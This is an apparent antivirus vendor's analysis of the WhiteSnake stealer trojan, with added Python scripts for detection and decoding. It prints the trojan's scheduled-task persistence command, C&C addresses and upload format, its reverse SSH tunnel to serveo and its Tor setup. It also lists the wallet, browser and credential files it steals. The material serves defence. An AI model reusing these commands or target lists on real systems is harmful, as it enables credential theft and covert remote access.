Trojan.Siggen21.39882

Added to the Dr.Web virus database: 2023-10-12

Description added:

Packer: .NET Reactor

SHA1 hash:

  • 9b75ef8a67b412122e03a8209c5d46ea5a8cd957 (original file name: «Дополнительные материалы, перечень вопросов, накладные и первичные документы.exe», Russian for "Additional materials, list of questions, waybills and primary documents.exe")

Description

A trojan application also known as WhiteSnake Stealer. It is written in .NET and targets computers running Microsoft Windows. Malicious actors use it to steal account data from a variety of software and to exfiltrate other data. In addition, it allows other programs to be downloaded and run on an infected system.

Operating routine

Verification of execution in virtual machines

Before infecting a target system, the trojan checks the runtime environment to detect whether it was launched in a virtual machine. It does this through the WMI interface, querying the Win32_ComputerSystem entity in the \root\CIMV2 namespace. This entity contains information about the computer's properties and the installed operating system.

In this structure, the Model and Manufacturer fields are checked for the presence of any of the following substrings:

  • virtual
  • vmbox
  • vmware
  • thinapp
  • VMXh
  • innotek gmbh
  • tpvcgateway
  • tpautoconnsvc
  • vbox
  • kvm
  • red hat
  • qemu

The above fields correspond to the following information:

  • Model ― the name assigned to the computer by its manufacturer;
  • Manufacturer ― the name of the computer manufacturer.

If a virtual machine is detected, the trojan stops working.

Anchoring in the system

The trojan copies itself into the %LOCALAPPDATA%/WindowsSecurity/ directory. Next, it executes a command that looks like this:

cmd.exe /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "<SAMPLE>" /sc MINUTE /tr "%LOCALAPPDATA%\WindowsSecurity\<SAMPLE.EXE>" /rl HIGHEST /f && DEL /F /S /Q /A "<PATH_SAMPLE.EXE>" && START "" "%LOCALAPPDATA%\WindowsSecurity\<SAMPLE.EXE>"

where SAMPLE is the name of the malware’s previously copied executable file.

This command performs a number of actions that include:

  1. Switching the console code page to 65001 (UTF-8).
  2. Pinging 127.0.0.1; the loopback address always answers, so this step mainly acts as a short delay before the following ones.
  3. Creating a scheduled task with the following parameters:
    • tn ― the task name;
    • tr ― the program the task runs (the copy in %LOCALAPPDATA%\WindowsSecurity);
    • sc ― the schedule type, MINUTE, i.e. the task fires every minute;
    • rl ― the run level, HIGHEST (if the trojan was launched without administrative rights, LIMITED is used instead);
    • f ― force creation, suppressing the warning if a task with this name already exists.
  4. Deleting the file from which the trojan was originally executed.
  5. Starting the trojan from %LOCALAPPDATA%\WindowsSecurity\<SAMPLE.EXE>.
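The chain above is distinctive enough to hunt for in process-creation telemetry (Sysmon event ID 1, or Security event 4688 with command-line auditing enabled). The following Python is an added example, not code from the page or from the malware: it splits such a command line on &&, extracts the schtasks switches, and scores the tell-tale combination. The sample command lines, user name and paths are constructed; the four-indicator threshold is a tuning choice.

```python
import re

# Constructed process-creation command lines (paths are hypothetical). The
# first mirrors the persistence command quoted in the description; the
# second is a benign scheduled-task creation for comparison.
SAMPLE_CMDLINES = [
    r'cmd.exe /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "WindowsSecurity" '
    r'/sc MINUTE /tr "C:\Users\u\AppData\Local\WindowsSecurity\WindowsSecurity.exe" '
    r'/rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\u\Downloads\documents.exe" '
    r'&& START "" "C:\Users\u\AppData\Local\WindowsSecurity\WindowsSecurity.exe"',
    r'schtasks /create /tn "NightlyBackup" /sc DAILY /tr "C:\Tools\backup.exe" /st 02:00',
]

# /tn, /tr, /sc, /rl followed by either a quoted value or a bare token
SCHTASKS_SWITCH = re.compile(r'/(tn|tr|sc|rl)\s+(?:"([^"]*)"|(\S+))', re.I)


def parse_schtasks(segment: str) -> dict:
    """Return the /tn, /tr, /sc and /rl values of a 'schtasks /create' segment."""
    opts = {}
    for m in SCHTASKS_SWITCH.finditer(segment):
        opts[m.group(1).lower()] = m.group(2) if m.group(2) is not None else m.group(3)
    return opts


def analyse_cmdline(cmdline: str) -> dict:
    """Split a cmd.exe command line on '&&' and score the persistence pattern."""
    task, deleted, started = {}, None, None
    for seg in (s.strip() for s in cmdline.split('&&')):
        low = seg.lower()
        if 'schtasks' in low and '/create' in low:
            task = parse_schtasks(seg)
        elif low.startswith('del '):
            m = re.search(r'"([^"]+)"', seg)
            deleted = m.group(1) if m else seg.split()[-1]
        elif low.startswith('start '):
            quoted = re.findall(r'"([^"]*)"', seg)  # START "" "<path>": title, then program
            started = quoted[-1] if quoted else None

    low = cmdline.lower()
    target = task.get('tr', '')
    indicators = []
    if 'chcp 65001' in low:
        indicators.append('console switched to UTF-8')
    if 'ping 127.0.0.1' in low:
        indicators.append('loopback ping used as a delay')
    if task.get('sc', '').upper() == 'MINUTE':
        indicators.append('task repeats every minute')
    if task.get('rl', '').upper() == 'HIGHEST':
        indicators.append('task requests highest run level')
    if '\\appdata\\local\\' in target.lower():
        indicators.append('task target lives under %LOCALAPPDATA%')
    if deleted and deleted.lower() != target.lower():
        indicators.append('a different executable is deleted in the same command')
    if started and started.lower() == target.lower():
        indicators.append('task target is started immediately')
    return {
        'task': task,
        'deleted': deleted,
        'started': started,
        'indicators': indicators,
        'suspicious': len(indicators) >= 4,  # threshold is a tuning choice
    }


if __name__ == '__main__':
    for line in SAMPLE_CMDLINES:
        print(analyse_cmdline(line))
```

Scoring on the combination rather than on any single switch keeps benign every-minute tasks and benign chcp calls from firing alone; the self-deletion of a different executable plus an immediate START of the task target is what makes this pattern a copy-and-persist chain.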

Distribution

Depending on the configuration, the trojan can spread in the following ways:

  • by infecting local user accounts;
  • by infecting removable storage devices

When infecting local user accounts, the trojan accesses the WMI interface, and in the \root\CIMV2 namespace, uses the entity Win32_UserAccount, which contains information about Windows user accounts. With the help of this structure, the trojan obtains the full list of users in the infected system. Next, the malicious program copies itself into the startup directory of every user.

When infecting removable storage devices, the trojan obtains the list of all the drives in the system. If any of the detected drives is removable, the malware copies itself to its root directory.

Collecting system information

The first network packet that the trojan sends to the C&C server after infecting the OS is a packet containing system information and the results obtained by executing tasks. The tasks that the trojan executes will be described in more detail in the corresponding section of the malware description.

Below is an example of the data sent in this packet.

  • Username ― the Windows user name. Taken from the UserName environment variable; spaces are replaced with the _ symbol.
  • Compname ― the name of the infected computer. Taken from the COMPUTERNAME environment variable; spaces are replaced with the _ symbol.
  • OS ― the operating system version. Taken from the OSVERSIONINFO structure.
  • Tag ― res1110myformish, a constant string that identifies the trojan's build.
  • IP ― the IP address of the infected computer. Taken from the response to a request to hxxp://ip-api[.]com/line?fields=query,country.
  • Screen size ― the screen resolution in the format <width>x<height>. *
  • CPU ― the processor name. From the Win32_Processor entity (\root\CIMV2 namespace), Name field.
  • GPU ― the video controller name. From the Win32_VideoController entity (\root\CIMV2 namespace), Name field.
  • RAM ― the amount of RAM in GB. From the Win32_ComputerSystem entity (\root\CIMV2 namespace), TotalPhysicalMemory field.
  • Disk ― the disk size in GB. From the Win32_LogicalDisk entity (\root\CIMV2 namespace).
  • Model ― the name given to the computer by its manufacturer. From the Win32_ComputerSystem entity (\root\CIMV2 namespace), Model field.
  • Manufacturer ― the computer manufacturer's name. From the Win32_ComputerSystem entity (\root\CIMV2 namespace), Manufacturer field.
  • Beacon ― the proxy type, a constant string whose value is either serveo or tor.
  • Stub version ― 1.6.1.3, a constant that represents the trojan's build version.
  • ExeeD ― the path to the currently executing file. *
  • Execution timestamp ― the current time. *
  • Screenshot ― a screenshot encoded with base64. *
  • LoadedAssemblies ― the list of DLLs loaded in the current process. *
  • RunningProcesses ― the list of running processes. *
  • InstalledApplications ― the list of installed applications. Taken from the DisplayName values under the SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall registry key.

*For fields where the data-collection method is not described, data is obtained by calling standard functions and algorithms for the C# language.

The packet is an XML document of the following form:


<Report xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
 <files>
   <file filename="" filedata="" filesize="" createdDate="" modifiedDate="" />
   ...
 </files>
 <information>
   <information key=$key_name value=$value />
   <information key=$key_name value=$value />
   ...
 </information>
</Report>

where:

  • $key_name and $value ― corresponding fields from the table;
  • files ― contains information about crypto-wallet files, session files, logs, and passwords.

The packet to be sent is encrypted with an RSA algorithm. The public encryption key is built into the trojan as an XML form and is shown below:


<RSAKeyValue>
    <Modulus>     qFKhw3Pbm+8iRzI/nVQppO1DlMBuIXV8x/mcTZJKMCT2MwkzUVD77VLFac3GGj5/vkbipjQP/gdeYSBHxr2KMNKgV8xfzlB5Az+dC3Rgy/bvO9DohGFnEx1CG7NJRuVt/gjy8gWeSOarnkEQIewXx/+D+xN4Fd4NWguHvPhUguI19kFpPx8f9U2/iv9CsctWvknAFadSd0uiNCvi2RIZQIcpFiUElxAezaZfL1w8BZ5vY/Hi/dstLEUyKqEoxq2ch+LIqTZoLYxkojfdOOyGoWgwY4NO7n5z5akqm9wFU00J7MhcbjhkfUPE/Yy6LXI8Q74CcIJqMYRRaNuwChLWLQ==
    </Modulus>
    <Exponent>
        AQAB
    </Exponent>
</RSAKeyValue>

The results from completing tasks are sent both to one of the C&C servers and to a dedicated Telegram chat.
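The RSAKeyValue document above is the format that RSA.ToXmlString produces in .NET. The following Python is an added example, not code from the page or the malware: it parses that document into its numeric parameters and reports what an analyst wants to know first, the key size, the public exponent, whether a private part is present, and how much plaintext a single PKCS#1 v1.5 operation with this key can carry. The modulus and exponent are the ones quoted above; the SHA-256 of the raw modulus is only a pivot value for matching other samples of the same build.

```python
import base64
import hashlib
import xml.etree.ElementTree as ET

# The RSAKeyValue block quoted in the description, with the modulus joined
# into one string (the .NET RSA.ToXmlString / FromXmlString format).
EMBEDDED_KEY_XML = (
    "<RSAKeyValue>"
    "<Modulus>qFKhw3Pbm+8iRzI/nVQppO1DlMBuIXV8x/mcTZJKMCT2MwkzUVD77VLFac3GGj5/vkbipj"
    "QP/gdeYSBHxr2KMNKgV8xfzlB5Az+dC3Rgy/bvO9DohGFnEx1CG7NJRuVt/gjy8gWeSOar"
    "nkEQIewXx/+D+xN4Fd4NWguHvPhUguI19kFpPx8f9U2/iv9CsctWvknAFadSd0uiNCvi2R"
    "IZQIcpFiUElxAezaZfL1w8BZ5vY/Hi/dstLEUyKqEoxq2ch+LIqTZoLYxkojfdOOyGoWgw"
    "Y4NO7n5z5akqm9wFU00J7MhcbjhkfUPE/Yy6LXI8Q74CcIJqMYRRaNuwChLWLQ==</Modulus>"
    "<Exponent>AQAB</Exponent>"
    "</RSAKeyValue>"
)


def parse_rsakeyvalue(xml_text: str) -> dict:
    """Parse a .NET RSAKeyValue document and summarise the key it carries."""
    root = ET.fromstring(xml_text)
    if root.tag != "RSAKeyValue":
        raise ValueError("not an RSAKeyValue document")

    def field(name: str) -> bytes:
        text = root.findtext(name)
        if text is None:
            raise ValueError(f"missing <{name}>")
        return base64.b64decode("".join(text.split()))  # tolerate line breaks in the value

    n = int.from_bytes(field("Modulus"), "big")
    e = int.from_bytes(field("Exponent"), "big")
    bits = n.bit_length()
    return {
        "bits": bits,
        "exponent": e,
        # a private RSAKeyValue additionally carries <D>, <P>, <Q>, <DP>, <DQ>, <InverseQ>
        "public_only": root.find("D") is None,
        # RFC 8017 section 7.2: PKCS#1 v1.5 encrypts at most k - 11 bytes per operation
        "max_pkcs1v15_bytes": bits // 8 - 11,
        # hash of the raw modulus, a convenient pivot between samples of one build
        "modulus_sha256": hashlib.sha256(n.to_bytes(bits // 8, "big")).hexdigest(),
    }


if __name__ == "__main__":
    for key, value in parse_rsakeyvalue(EMBEDDED_KEY_XML).items():
        print(f"{key}: {value}")
```

A 2048-bit key with e = 65537 can wrap only 245 bytes per PKCS#1 v1.5 operation (fewer with OAEP), so a report that carries a base64 screenshot and wallet files cannot be encrypted by the RSA key alone. The description does not say how the bulk of the report is protected; when reversing the sample, look for a symmetric key that is itself RSA-encrypted and sent alongside the data.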

The specifics of transferring data to the C&C server

To select a C&C server IP address, the trojan sends a packet to each address from the available list until the transmission is successful. Below is the list of addresses:


hxxp[:]//213[.]232.255.61:8080
hxxp[:]//88[.]99.71.225:8080
hxxp[:]//51[.]178.53.191:8080
hxxp[:]//78[.]46.66.9:8080
hxxp[:]//135[.]181.206.12:8080
hxxp[:]//217[.]145.238.175:80 
hxxps[:]//164[.]90.185.9:443 
hxxp[:]//94[.]156.6.209:80
hxxp[:]//104[.]248.253.214:80
hxxp[:]//141[.]94.175.31:8098 
hxxp[:]//34[.]207.71.126:80 
hxxp[:]//192[.]99.44.107:8080 
hxxp[:]//107[.]161.20.142:8080 
hxxp[:]//52[.]86.18.77:8080
hxxps[:]//192[.]99.196.191:443 
hxxp[:]//216[.]250.190.139:80 
hxxp[:]//205[.]185.123.66:8080 
hxxp[:]//52[.]26.63.10:9999 
hxxp[:]//24[.]199.110.250:8080 
hxxp[:]//45[.]55.65.93:80 
hxxp[:]//139[.]99.123.53:9191 
hxxps[:]//44[.]228.161.50:443 
hxxp[:]//162[.]33.178.113:80 
hxxp[:]//167[.]71.106.175:80 
hxxp[:]//45[.]76.190.214:1024 
hxxp[:]//154[.]31.165.232:80 
hxxp[:]//168[.]138.211.88:8099 
hxxps[:]//52[.]193.176.117:443 
hxxps[:]//52[.]196.241.27:443 
hxxps[:]//54[.]249.142.23:443 
hxxp[:]//121[.]63.250.132:88

The request is generated as follows:

  • Transmission method: PUT.
  • Request path: <rand_str>_<username>@<compname>_report.wsr, where:
    • <rand_str> ― a random string of 5 characters;
    • <username> ― the user name;
    • <compname> ― the name of the computer.
  • The body is transferred as a file upload.
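The fixed address list, the PUT path format and the earlier ip-api.com lookup together give three network indicators that can be checked in proxy or egress logs. The following Python is an added example, not code from the page: it runs that detection logic over a constructed log in a "<timestamp> <method> <url> <status>" format of my own; the user name, computer name, random prefix and the Telegram token placeholder are made up, while the host:port pairs are the C&C list quoted above with the defanging removed.

```python
import re
from urllib.parse import urlsplit

# host:port pairs from the C&C list quoted above (defanging removed)
C2_SERVERS = {
    "213.232.255.61:8080", "88.99.71.225:8080", "51.178.53.191:8080",
    "78.46.66.9:8080", "135.181.206.12:8080", "217.145.238.175:80",
    "164.90.185.9:443", "94.156.6.209:80", "104.248.253.214:80",
    "141.94.175.31:8098", "34.207.71.126:80", "192.99.44.107:8080",
    "107.161.20.142:8080", "52.86.18.77:8080", "192.99.196.191:443",
    "216.250.190.139:80", "205.185.123.66:8080", "52.26.63.10:9999",
    "24.199.110.250:8080", "45.55.65.93:80", "139.99.123.53:9191",
    "44.228.161.50:443", "162.33.178.113:80", "167.71.106.175:80",
    "45.76.190.214:1024", "154.31.165.232:80", "168.138.211.88:8099",
    "52.193.176.117:443", "52.196.241.27:443", "54.249.142.23:443",
    "121.63.250.132:88",
}

# <rand_str>_<username>@<compname>_report.wsr, rand_str being 5 characters
REPORT_PATH = re.compile(r"^/[A-Za-z0-9]{5}_[^/@]+@[^/]+_report\.wsr$")

# Constructed proxy log in a made-up "<timestamp> <method> <url> <status>" format
SAMPLE_LOG = """\
2023-10-12T10:00:01Z GET http://ip-api.com/line?fields=query,country 200
2023-10-12T10:00:03Z PUT http://213.232.255.61:8080/aB3xZ_john_doe@DESKTOP-1234_report.wsr 200
2023-10-12T10:00:05Z POST https://164.90.185.9/api/ping 200
2023-10-12T10:00:07Z GET https://api.telegram.org/bot<redacted>/sendMessage?chat_id=1&text=23&reply_markup=7b7d&parse_mode=HTML 200
2023-10-12T10:05:00Z GET https://example.org/index.html 200
"""


def classify(line: str) -> list[str]:
    """Return the indicators matched by one log line (empty list if none)."""
    _ts, method, url, _status = line.split()
    u = urlsplit(url)
    port = u.port or (443 if u.scheme == "https" else 80)  # normalise implicit ports
    hostport = f"{u.hostname}:{port}"
    findings = []
    if hostport in C2_SERVERS:
        findings.append(f"known C&C endpoint {hostport}")
    if method == "PUT" and REPORT_PATH.match(u.path):
        findings.append("report upload path pattern")
    if u.hostname == "ip-api.com" and u.path == "/line" and "fields=query,country" in u.query:
        findings.append("ip-api.com lookup with the sample's field list")
    if u.hostname == "api.telegram.org" and u.path.startswith("/bot") and "reply_markup=" in u.query:
        findings.append("Telegram bot sendMessage with reply_markup")
    return findings


def scan_log(text: str) -> list[tuple[int, list[str]]]:
    """Run classify() over every line; keep only lines with at least one finding."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        if line.strip():
            findings = classify(line)
            if findings:
                hits.append((number, findings))
    return hits


if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print(number, findings)
```

The path pattern is the most durable of the three indicators: the address list changes between builds, and ip-api.com is used by plenty of legitimate software, so alone it is only corroborating evidence.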

The specifics of transferring data to a Telegram chat

The following message is formed:


#res1110myformish #Wallets #Beacon
<b>OS:</b> <i><Operating system></i>
<b>Country:</b> <i><Country></i>
<b>Username:</b> <i><Windows user account name></i>
<b>Compname:</b> <i><Computer name></i>
<b>Report size:</b> <Size of the sent XML>Mb

Telegram’s API is used to send the packet. The main URL that contains the API token:


hxxps[:]//api[.]telegram[.]org/bot660*******:AAHL********_******UfVtaKSR2*******

The following request parameters are added to this URL:

  • chat_id=****91**** ― a constant from the malware’s configuration.
  • text=hexlify(data) ― contains the text of the message (described above); the data is converted using the hexlify function.
  • reply_markup= ― contains a json, converted with the hexlify function.
  • parse_mode=HTML.

The data from the json:


{
  "inline_keyboard": [
    [
      {
        "text": "Download",
        "url": "<c2_response>"
      },
      {
        "text": "Open",
        "url": "<url>"
      }
    ]
  ]
}

where:

  • <c2_response> ― the C&C server’s response to the sent report;
  • <url> ― the hxxp[:]//127[.]0.0.1:18772/handleOpenWSR?r=<c2_response> address.
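Because both the message text and the reply_markup JSON travel as hex strings in the query, a captured request can be decoded back into the fields above without any key. The following Python is an added example, not code from the page or the malware: it builds one request in the described shape from constructed values (placeholder token, chat id, user, computer and C&C response; "hexlify" is assumed to mean plain hex of the UTF-8 bytes) and then decodes it the way an analyst would decode a real capture, pulling out the hashtags, the key/value lines, the two buttons and whether the "Open" button points at the local handleOpenWSR listener.

```python
import binascii
import json
import re
from urllib.parse import parse_qs, urlsplit


def hexlify(text: str) -> str:
    """Assumed meaning of the 'hexlify' step: hex of the UTF-8 bytes."""
    return binascii.hexlify(text.encode("utf-8")).decode("ascii")


# Constructed request in the shape the description gives; the token, chat id,
# user, computer and C&C response are placeholders, not real indicators.
MESSAGE = (
    "#res1110myformish #Wallets #Beacon\n"
    "<b>OS:</b> <i>Windows 10 Pro</i>\n"
    "<b>Country:</b> <i>RU</i>\n"
    "<b>Username:</b> <i>john_doe</i>\n"
    "<b>Compname:</b> <i>DESKTOP-1234</i>\n"
    "<b>Report size:</b> 1.2Mb"
)
C2_RESPONSE = "http://c2.invalid/aB3xZ_john_doe@DESKTOP-1234_report.wsr"
MARKUP = {"inline_keyboard": [[
    {"text": "Download", "url": C2_RESPONSE},
    {"text": "Open", "url": f"http://127.0.0.1:18772/handleOpenWSR?r={C2_RESPONSE}"},
]]}
SAMPLE_REQUEST = (
    "https://api.telegram.org/bot<token>/sendMessage"
    f"?chat_id=123456&text={hexlify(MESSAGE)}"
    f"&reply_markup={hexlify(json.dumps(MARKUP))}&parse_mode=HTML"
)

FIELD = re.compile(r"<b>([^<:]+):</b>\s*(.*)")  # "<b>Key:</b> value" lines
HTML_TAG = re.compile(r"<[^>]+>")


def decode_telegram_request(url: str) -> dict:
    """Recover message, hashtags, key/value fields and buttons from a captured URL."""
    q = parse_qs(urlsplit(url).query)
    text = binascii.unhexlify(q["text"][0]).decode("utf-8")
    markup = json.loads(binascii.unhexlify(q["reply_markup"][0]))
    lines = text.splitlines()
    fields = {}
    for line in lines[1:]:
        m = FIELD.match(line)
        if m:
            fields[m.group(1)] = HTML_TAG.sub("", m.group(2)).strip()
    buttons = [b for row in markup.get("inline_keyboard", []) for b in row]
    return {
        "chat_id": q.get("chat_id", [None])[0],
        "tags": [w for w in lines[0].split() if w.startswith("#")],
        "fields": fields,
        "buttons": buttons,
        # the "Open" button targets a listener on the infected host itself
        "opens_local_handler": any(
            b.get("url", "").startswith("http://127.0.0.1:18772/handleOpenWSR")
            for b in buttons
        ),
    }


if __name__ == "__main__":
    print(json.dumps(decode_telegram_request(SAMPLE_REQUEST), indent=2))
```

The first hashtag is the build tag (the same value as the Tag field of the system-information packet), so it is the natural key for grouping captures by campaign; the "Open" URL only works from the operator's own machine, where the same malware kit listens on 127.0.0.1:18772.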

Tasks executed when collecting information

The trojan has a built-in XML form with a list of data-collection tasks. This form consists of blocks of tasks that are structured as follows:


<command name="0">
    <args>
        <string>...</string>
        ...
    </args>
</command>

where:

  • name ― the type of task executed;
  • args ― the list of arguments for the task.

Collected data

  1. Collecting data using regular expressions ― files that match a pattern are collected from the target directory (directory ― patterns):
    • %AppData%\Authy Desktop\Local Storage\leveldb ― *
    • %AppData%\dolphin_anty ― db.json
    • %USERPROFILE%\OpenVPN\config ― *\*.ovpn
    • %AppData%\WinAuth ― *.xml
    • %AppData%\obs-studio\basic\profiles ― *\service.json
    • %AppData%\FileZilla ― sitemanager.xml, recentservers.xml
    • %LocalAppData%\AzireVPN ― token.txt
    • %USERPROFILE%\snowflake-ssh ― session-store.json
    • %ProgramFiles(x86)%\Steam ― ssfn*, config\*.vdf
    • %Appdata%\Discord\Local Storage\leveldb ― *.l??
    • %AppData%\The Bat! ― ACCOUNT.???
    • %SystemDrive% ― Account.rec0
    • %AppData%\Signal ― config.json, sql\db.sqlite
    • %AppData%\Session ― config.json, sql\db.sqlite
    • %AppData%\tox ― *.db, *.tox, *.ini, *.json, *.hstr
    • %AppData%\.purple ― accounts.xml
    • %AppData%\ledger live ― app.json
    • %AppData%\atomic\Local Storage\leveldb ― *.l??
    • %AppData%\WalletWasabi\Client\Wallets ― *.json
    • %AppData%\Binance ― *.json
    • %AppData%\Guarda\Local Storage\leveldb ― *.l??
    • %LocalAppData%\Coinomi\Coinomi\wallets ― *.wallet
    • %AppData%\Bitcoin\wallets ― *\*wallet*
    • %AppData%\Electrum\wallets ― *
    • %AppData%\Electrum-LTC\wallets ― *
    • %AppData%\Zcash ― *wallet*dat
    • %AppData%\Exodus ― exodus.conf.json, exodus.wallet\*.seco
    • %AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb ― .l??
    • %AppData%\Jaxx\Local Storage\leveldb ― .l??
    • %UserProfile%\Documents\Monero\wallets ― *\*
    • %AppData%\MyMonero ― FundsRequests*, PasswordMeta*, Wallets*
    • %UserProfile%\Desktop ― *.txt, *.doc*, *.xls*, *.kbd*, *.pdf
    • %UserProfile%\Downloads ― *.txt, *.doc*, *.xls*, *.kbd*, *.pdf
    • %AppData%\Telegram Desktop\tdata ― *s;????????????????\*s
  2. Collecting user profiles ― all data is copied from the target directory:
    • %AppData%\Google\Chrome\Profiles
    • %AppData%\Yandex\YandexBrowser\Profiles
    • %AppData%\Vivaldi\Profiles
    • %AppData%\CocCoc\Browser\Profiles
    • %AppData%\CentBrowser\Profiles
    • %AppData%\BraveSoftware\Brave-Browser\Profiles
    • %AppData%\Chromium\Profiles
    • %AppData%\Microsoft\Edge\Profiles
    • %AppData%\Opera Software\Opera Stable
    • %AppData%\Opera Software\Opera GX Stable
    • %Appdata%\Discord
    • %LocalAppdata%\Mozilla\Firefox\Profiles
    • %LocalAppdata%\Thunderbird\Profiles
  3. Collecting data about crypto wallets. The crypto wallets that the malicious actors are interested in (wallet ― ID of the corresponding browser extension):
    • Metamask ― nkbihfbeogaeaoehlefnkodbefgpgknn
    • Ronin ― fnjhmkhhmkbjkkabndcnnogagogbneec
    • BinanceChain ― fhbohimaelbohpjbbldcngcnapndodjp
    • TronLink ― ibnejdfjmmkpcnlpebklmnkoeoihofec
    • Phantom ― bfnaelmomeimhlpmgjnjophhpkkoljpa
  4. Collecting data from the Windows registry (key ― values collected):
    • SOFTWARE\Martin Prikryl\WinSCP 2\Sessions\* ― HostName, UserName, Password
    • SOFTWARE\FTPWare\CoreFTP\Sites\* ― Host, Port, User, PW
    • SOFTWARE\Windscribe\Windscribe2 ― userId, authHash
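The patterns in item 1 are Windows wildcards rather than regular expressions in the strict sense, and the difference matters when assessing what a victim lost: * and ? do not cross a backslash, so *\*.ovpn takes .ovpn files exactly one directory below the config folder and nothing at the top level. The following Python is an added example, not code from the page or the malware: it turns a few rows of the table into anchored regexes with those semantics and runs them over a constructed file listing. The variable expansions (user "u") and the file names are assumptions.

```python
import re

# Assumed expansions of the environment variables used in the table (user "u")
ENV = {
    "%AppData%": r"C:\Users\u\AppData\Roaming",
    "%LocalAppData%": r"C:\Users\u\AppData\Local",
    "%USERPROFILE%": r"C:\Users\u",
    "%ProgramFiles(x86)%": r"C:\Program Files (x86)",
}

# A few (directory, patterns) rows copied from item 1 of the list above
TARGETS = [
    (r"%USERPROFILE%\OpenVPN\config", [r"*\*.ovpn"]),
    (r"%AppData%\FileZilla", ["sitemanager.xml", "recentservers.xml"]),
    (r"%ProgramFiles(x86)%\Steam", ["ssfn*", r"config\*.vdf"]),
    (r"%AppData%\Electrum\wallets", ["*"]),
    (r"%UserProfile%\Desktop", ["*.txt", "*.doc*", "*.xls*", "*.kbd*", "*.pdf"]),
]

# Constructed file listing of a hypothetical host
SAMPLE_FILES = [
    r"C:\Users\u\OpenVPN\config\office\vpn.ovpn",
    r"C:\Users\u\OpenVPN\config\vpn.ovpn",
    r"C:\Users\u\AppData\Roaming\FileZilla\sitemanager.xml",
    r"C:\Users\u\AppData\Roaming\FileZilla\filezilla.xml",
    r"C:\Program Files (x86)\Steam\ssfn1234567890123",
    r"C:\Program Files (x86)\Steam\config\loginusers.vdf",
    r"C:\Users\u\AppData\Roaming\Electrum\wallets\default_wallet",
    r"C:\Users\u\Desktop\passwords.txt",
    r"C:\Users\u\Desktop\report.docx",
    r"C:\Users\u\Desktop\notes.md",
]


def expand(path: str) -> str:
    """Expand %VAR% placeholders case-insensitively, as Windows itself does."""
    for var, value in ENV.items():
        path = re.sub(re.escape(var), lambda _m, v=value: v, path, flags=re.I)
    return path


def glob_to_regex(directory: str, pattern: str) -> re.Pattern:
    """Translate directory + Windows wildcard pattern into an anchored regex.
    '*' and '?' never cross a backslash, so "*\\*.ovpn" means exactly one subdirectory."""
    out = ""
    for ch in expand(directory) + "\\" + pattern:
        if ch == "*":
            out += r"[^\\]*"
        elif ch == "?":
            out += r"[^\\]"
        else:
            out += re.escape(ch)
    return re.compile("^" + out + "$", re.I)


def matching_files(paths, targets=TARGETS) -> dict:
    """Map each path the stealer would collect to the table rule that matched it."""
    rules = [(d + "\\" + p, glob_to_regex(d, p)) for d, pats in targets for p in pats]
    hits = {}
    for path in paths:
        for rule, rx in rules:
            if rx.match(path):
                hits[path] = rule
                break
    return hits


if __name__ == "__main__":
    for path, rule in matching_files(SAMPLE_FILES).items():
        print(f"{path}  <-  {rule}")
```

Running the full table against a forensic file listing of the infected host gives a defensible list of what the first report could have contained; the same function, fed with the actual user profile paths, also shows which files an analyst should treat as compromised credentials.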

Keylogger registration

The initial keylogger registration is performed when the trojan starts. Its further interaction with the keylogger is carried out through commands received from the C&C server. Keystroke data is saved to the malware’s memory.

Command execution

Before the trojan begins executing commands, it sets up a tunnel through which the C&C operator can reach it. The malware's configuration has a field that selects the proxy type:

  • serveo ― a tunnel over the SSH protocol through the Serveo service;
  • tor ― a Tor hidden service.

The information about the type of proxy used is sent to the C&C server in the first packet with the system information and is located in the Beacon field.

A proxy server based on the Tor protocol

The trojan checks whether the Tor application has already been downloaded by testing for the file %LOCALAPPDATA%/9hyfy7lwm1/tor\tor-real.exe. If it does not exist, the trojan downloads it from hxxps[:]//github[.]com/matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip.

Next, it writes the Tor configuration file %LOCALAPPDATA%/9hyfy7lwm1/tor\torrc.txt with the following contents:


SOCKSPort <port>+1
ControlPort <port>+2
DataDirectory %LOCALAPPDATA%/9hyfy7lwm1/tor/data
HiddenServiceDir %LOCALAPPDATA%/9hyfy7lwm1/tor/host
HiddenServicePort 80 127.0.0.1:<port>
HiddenServiceVersion 3

where <port> is the port number that the trojan opens; the SOCKS and control ports are that number plus one and plus two respectively. The HiddenServicePort line makes port 80 of the v3 onion service forward to 127.0.0.1:<port> on the infected host, so the operator reaches the trojan through the onion address that Tor stores in the host directory.

Lastly, the trojan launches Tor with the command %LOCALAPPDATA%/9hyfy7lwm1/tor\tor-real.exe -f '%LOCALAPPDATA%/9hyfy7lwm1/tor\torrc.txt'.

A proxy server based on the SSH protocol and a Serveo service

The trojan checks whether OpenSSH has already been downloaded by looking for the SOFTWARE\OpenSSH Windows registry key. If the key does not exist, the trojan downloads a ZIP archive containing the program from hxxps[:]//github[.]com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip and saves it as %TEMP%/ssh-000.zip.

Next, it unpacks the archive and launches OpenSSH with the following command:

ssh.exe -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:1233 serveo[.]net

where:

  • -o "StrictHostKeyChecking=no" ― passes an SSH client option: the server's host key is accepted without verification, so the connection succeeds on a host that has never connected to serveo[.]net before;
  • -R 80:127.0.0.1:1233 ― requests remote port forwarding: connections that the Serveo side receives on port 80 are tunnelled back to 127.0.0.1:1233 on the infected host, which exposes the trojan's local listener through Serveo;
  • serveo[.]net ― the SSH server of the Serveo service that terminates the tunnel.

Commands executed by the trojan

After the tunnel is initialized, the trojan creates an HttpListener on the local port that the tunnel forwards to and waits for commands to arrive through it.

Below is the list of commands available to the trojan:

  • PING ― the following response is returned to the C&C server: PONG >> <title> >> <keys> >> 0, where:
    • title ― the current process name;
    • keys ― the data collected by the keylogger.
  • UNINSTALL ― removes the trojan from the infected system:
    • the currently running malware process is stopped;
    • the command cmd /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "<PATH_SAMPLE.EXE>" is launched to delete the trojan's executable file.
  • REFRESH ― re-collects system information and user data.
  • SCREENSHOT ― takes a screenshot.
